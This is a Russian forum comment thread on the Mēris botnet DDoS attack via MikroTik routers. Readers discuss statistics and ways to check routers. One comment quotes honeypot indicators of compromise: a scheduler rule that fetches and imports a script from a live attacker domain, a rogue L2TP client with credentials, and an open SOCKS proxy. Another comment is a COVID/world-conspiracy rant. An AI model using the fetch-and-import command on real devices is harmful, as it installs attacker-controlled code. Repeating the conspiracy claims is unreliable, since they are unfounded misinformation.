    Странно, я ранее читал, что например Россия и Бразилия одни из крупнейших потребителей продукции MikroTik, а в США они не очень распространены. По приведённой таблице 42,6% зомби-хостов в США, в Бразилии — 2,8%, а Россия даже в топ не вошла. Впрочем в достоверности данных по распределению по странам уверенности конечно нет. Хотя в России MikroTik точно очень распространён. Значит опять «у них» скажут, что русские хакеры виноваты. А «у нас» скажут, что вокруг враги.
    И я кстати ни разу не удивлюсь если окажется, что никакой уязвимости и вовсе нет, а все эти сотни тысяч микротов просто были криво настроены и торчали в интернет голым задом.


    1. Maxim_Q
      09.09.2021 21:14
      +1

      Для распространенности нужно учитывать сколько всего там пользователей интеренена в других странах и сколько в процентном отношении любителей микротика.

      Например у нас 1000 челокек пользуется интренетом и из них 100 человек купили микротик, итого 10%. Распространенность 10%.

      У них 10 000 челокек пользуется интернетом и из них 200 человек сидит с микротиком, это не в два раза больше, это всего 2% против 10%.


      1. Mur81
        09.09.2021 22:39

        Я думаю, что там имелось в виду именно абсолютное количество устройств. Впрочем я не помню где я это читал и откуда вообще эти данные были.
        Но в любом случае очень странное процентное распределение.


    1. ximaera
      09.09.2021 23:07
      +2

      Комментарий из сообщества североамериканских операторов связи:

      Mikrotik is a very popular router in small to medium ISPs, running, well, everything.


    1. sebres
      15.09.2021 18:48

      В приведённой таблице не микротики (и вероятно даже не зомби-хосты), а грубо говоря количество точек с активным TCP-listener на 5678 порту, ибо:

      Возможно, Mikrotik и Linksys не единственные, но у нас нет другого выбора, кроме как предположить, что 328 723 – это и есть число хостов в активном ботнете.

      Например, у меня рутер тоже 5678 портом наружу торчит, но ваш покорный слуга использует его для совершенно других нужд (порт то как бы для RRAC изначально), и у меня не микротик, но меня возможно тоже посчитали.

      Странно, что сперва речь шла про комбинацию с портом 2000:

      Однако конкретная комбинация порта 2000 с «Bandwidth test server» и порта 5678 с «Mikrotik Neighbor Discovery Protocol» почти не оставляет почвы для сомнений в наших выводах.

      Но просканировали почему-то только на предмет открытости TCP 5678:

      ... мы решили проверить TCP-порт 5678 с помощью Qrator.Radar


  1. gameplayer55055
    09.09.2021 19:47

    А как вы их успеваете заблочить? Чисто из-за пайплайнинга, или что-то ещё есть?

    Просто припустим большой ботнет начнет качать index.html. как их отфильтровать от пользователей?

    И ещё вопрос, как дела предстоят с http2? Там будет атака хуже/лучше?


  1. vasilevss
    09.09.2021 23:54
    -3

    Не большой сторонник теорий заговора, но где-то проскакивала новость, что РКН "успешно" протестировал блокировку vpn сервисов. Совпадение?


  1. BasilioCat
    10.09.2021 10:51

    Кроме того, мы направили всю собранную информацию в профильные организации.

    А у этих профильных организаций, под которыми, видимо, понимаются борцы с DDoS-атаками, нет ли какой-нибудь ассоциации для координации усилий? Или каждый считает собранные блэклисты своим конкуретным преимуществом, и с другими в общем случае не делится?


  1. amarao
    10.09.2021 16:41
    +3

    Для тех, кто не понимает, что такое 20MRPS. Если каждый запрос (аммортизированно) - это порядка 200 байт заголовков и запроса, то речь идёт про примерно 40 гигабит осмысленного трафика с запросами на каждый из которых сервера должны ответить. Не пустого флуда, который на сетевом уровне режется на достаточно толстом оборудовании с малыми проблемами, а самого что ни на есть "живого" и напоминающего клиентский.


  1. dtmse
    12.09.2021 13:11
    +1

    Вопрос: каким образом был получен график распределения версий RouterOS из статьи?


  1. r0zh0k
    12.09.2021 17:30

    Каким образом я могу проверить свой роутер на зараженность?


    1. andryu
      13.09.2021 08:59
      +1

      Ответ разработчиков:

      В частности, мы предлагаем отключить SOCKS и заглянуть в меню Система -> Планировщик. Отключите все правила, которые вы не можете определить. По умолчанию правил планировщика быть не должно, а SOCKS должен быть выключен.


      1. r0zh0k
        13.09.2021 14:54
        +1

        Спасибо, Socks у меня отключен а в планировщике вообще ничего нет. Значит я в порядке?


        1. andryu
          13.09.2021 15:10
          +3

          На счёт вас не знаю, а mikrotik с высокой долей вероятности чумой не заразился :)


        1. trak
          14.09.2021 14:18

          Тут требуется, фото. (На самом деле Вы задали вопрос, который интересновал и меня, я только пару дней как купил и поставил микротик)


    1. w0rms
      13.09.2021 21:16
      +3

      Проверить:
      - system->scheduler на наличие незнакомого плана (у моей honeypot это был план
      name="U6"
      interval=3m o
      n-event=/tool fetch url=http://strtbiz.site/poll/7edc6ee2-154f-47f1-b430-07871f8e9c40
      mode=http
      dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc
      policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive
      )
      -
      ppp->Interface на наличие незнакомого l2tp-клиента (мой вариант
      name="lvpn"
      connect-to=s71.leappoach.info
      user="user5589762"
      password="pass5589762"
      )
      - ip->socks ( enabled: yes
      port: 5678
      connection-idle-timeout: 2m
      max-connections: 200
      version: 4
      auth-method: none)


      1. r0zh0k
        13.09.2021 22:33

        Все пусто, спасибо!


      1. AlexPancho
        14.09.2021 12:29
        +1

        спасибо


      1. trak
        14.09.2021 14:21
        +1

        Вы мой герой! :)


  1. EdjKa
    13.09.2021 21:17

    Зацепился за слово Mēris, т.к сам из Латвии, открыл статью - а тут такое. Пользую hapac2, как узнать что я не в ботнете? Без ответа не усну :)


    1. r0zh0k
      13.09.2021 22:34

      На один коммент выше смотрите https://habr.com/ru/company/yandex/blog/577026/comments/#comment_23479818


  1. ctocopok
    13.09.2021 21:17

    Открыт TCP 2000, но закрыт TCP 5678

    Устройство взломано?

    Яндекс недавно стал говорить, при поиске, что мои запросы похожи на автоматические. То ли действительно мой роутер к нему активно долбился, то ли ip попал в базу адресов с открытым 2000, а потому - подозрителен.

    Как бы выяснить...


    1. maxwolf
      16.09.2021 13:29

      Открытый порт 2000 скорее всего означает, что на вашем микротике включен bandwidth test server. Если вас это смущает, его можно просто выключить.


      1. AcidVenom
        16.09.2021 14:02

        Это означает, что на внешний интерфейс ваш роутер принимает пакеты, а не дропает их.

        Выключая сервер BT вы лечите симптомы, а не причину.


  1. q2ker
    13.09.2021 21:17

    Как опознать что твой микротик взломан? Должны быть открыты порты 5678 и 2000? Если этого нет, значит все в порядке?



  1. 1name
    14.09.2021 19:07
    -5

    20 млн RPS — это самая крупная атака из известных за всю историю интернета.

    20 млн запросов в секунду? Я правильно понял? И это самая крупная атака за всю историю интернета?! - Аж как-то смешно... Процессор 1 GHz способен обрабатывать миллиард операций в секунду. А 20 млн, мне кажется это нормальная рабочая нагрузка для поисковой системы, типа Google, а для Яндекса это по всей видимости - подвиг...


    1. BarakAdama Автор
      14.09.2021 21:25
      +1

      Вы сравнили запрос к сервису с базовой операцией на процессоре? :)


      1. 1name
        15.09.2021 19:57
        -4

        Я сравнил вычислительные возможности одного ПК с одной точкой доступа к интернету, с этой "дос.атакой тысячелетия" :) Например длина запроса "привед медвед" = 25 байт. Делим 1024 / 25 = 40,96 запросов в 1KB; Округляем до 41 и умножаем на 1024 = 41984 запросов в 1Мб * 100 = 4 198 400 возможных запросов длиной 25 байт в 100 мегабайтах. Сократите длину запроса до "null" (4 байта) и вы получите где-то 21,8 млн RPS.

        Чтоб отправить 100Мб за секунду, нужна скорость интернета до 1 Гигабит и 1 ПК с обычным процессором. Никаких 200 000 устройств для этого не нужно. На сколько я знаю, в некоторых странах уже есть домашний интернет со скоростью 1Гбит/с.

        Поисковые системы, такие как Яндекс, Google и др., просто обязаны иметь ширину канала гораздо больше, если они позиционируют себя глобальной поисковой системой.

        Я бегло прочитал статью и не увидел время (продолжительность) предполагаемой DDoS-атаки. Возможно это было совпадение, и в какой-то момент в систему поступил 21 миллион реальных запросов. Сегодня интернетом пользуются около 4-х миллиардов людей... Поправьте меня пожалуйста, если я где-то ошибся.

        мы в Яндексе собрали данные о 56 000 атакующих устройств

        - по моему у вас система просто тупит :)


        1. BarakAdama Автор
          15.09.2021 20:31

          Ключевая ошибка в том, что вы запросы начали переводить в веса. В этом нет никакого смысла.

          Но я по-прежнему надеюсь, что это просто троллинг такой :)


          1. 1name
            17.09.2021 07:37
            -1

            Ключевая ошибка в том, что вы запросы начали переводить в веса.

            По вашему электрический сигнал не имеет размерности? Или это кто-то на электростанции игрался рубильником, отправляя нули и единицы на сервера Яндекса, и таким образом сделал досатаку?

            Для общего развития:

            Сигнал — материальное воплощение сообщения для использования при передаче, переработке и хранении информации.

            Но я по-прежнему надеюсь, что это просто троллинг такой :)

            По ходу это вы тролите людей своей статьёй. А админы (или хз. кто), делают карму людям XD И в таком случае, всё это танцы с бубном.


  1. garikrin
    15.09.2021 20:35
    -4

    Ребят, не верьте им. Это самый глобальный сговор в истории.

    Вот уже Яндекс заговорил о кибератаках. Все по сценарию. Один и тот же фейк со Сбером (читайте новость на хбре недельной даности). Ждите переворот этой осенью.

    Напоминаю что 2 месяца назад прошел всемирный киберполигон, на котором те же люди, которые стоят за короновирусом , запланировали кибератаки. Это аналог события 201 (читайте Википедию) на котором за 74 дня до пандемии они говорили о будущей "внезапной" пландемии....

    Будет переход на единую цифровую валюту после этого и весь кавидный режим ужесточат!

    И похоже не будет доступа к деньгам. Не будет света, интернета несколько дней и будут эвакуации людей в кавид лагеря.

    Готовьтесь.

    Неделю назад аналогичная кибератака "произошла" на Сбер. Греф, Мишустин, Шваб - участники кибеполигона.

    Кто то ещё сомневается во всемирном заговоре элит?

    Это самый глобальный фейк развод, ребят. И се с ужасным кавидом это все звенья одной цепи и кусочки одного пазла, кто до сих пор не понимает. Нас всех хотят поиметь этой осенью.

    Яндек работает на правительство РФ. Аналгично как гугл работает на правительсво США. Читай на мировое правительство, закулисье.

    Всем пора просыпаться.


    1. BarakAdama Автор
      15.09.2021 20:35
      +3

      Лучший комментарий треда.


    1. AcidVenom
      15.09.2021 21:05


    1. kspshnik
      20.09.2021 10:24

      Чего и сколько?


  1. SmaugRrotarr
    17.09.2021 18:21

    Когда эта новость появилась - сразу побежал проверять свой микрот на наличие вот этих вот проблем. В итоге всё оказалось хорошо, но проверить никогда не лишне.

    Не смотря на явные признаки отношения атаки к микротам, думаю справедливо допустить, что среди ботнетов есть огромное количество и других устройств. Не думаю, что только с микротами неосторожно обращаются, а различные кинетики до 2018 года выпуска тоже сами не обновятся, если им не сказать. Что и говорить, два года назад сам менял в одной бюджетной организации DIR-100 на микрот. Вот смех смехом, а мы думали их хоть какой-то админ обслуживает и меняет оборудование раз в N лет. Так что комментарии о том, что микроты не стоит нигде ставить, на мой взгляд, чистой воды предвзятое отношение. Хотя следует быть внимательным с этим изделием латвийского гения. Нет-нет, да найдётся какой-то небольшой баг, над которым потом голову ломаешь час.

    Больше всего интересно, возможно ли определить центральный источник этой атаки? Очевидно, что за всем этим стоят живые люди, которые выявляют уязвимости, совершают взлом, дают распоряжение запустить использование уязвимости, да и нажимают нужную комбинацию клавиш для её запуска. Может быть есть и те, кто разработают методику поиска хотя бы части виновников?

    К слову, помнится на хабре читал статью энтузиаста, который находил в интернете и исправлял эту самую уязвимость. Возможно, стоит связаться с ним и им подобным соответствующим инстанциям для помощи в решении проблемы на официальном уровне?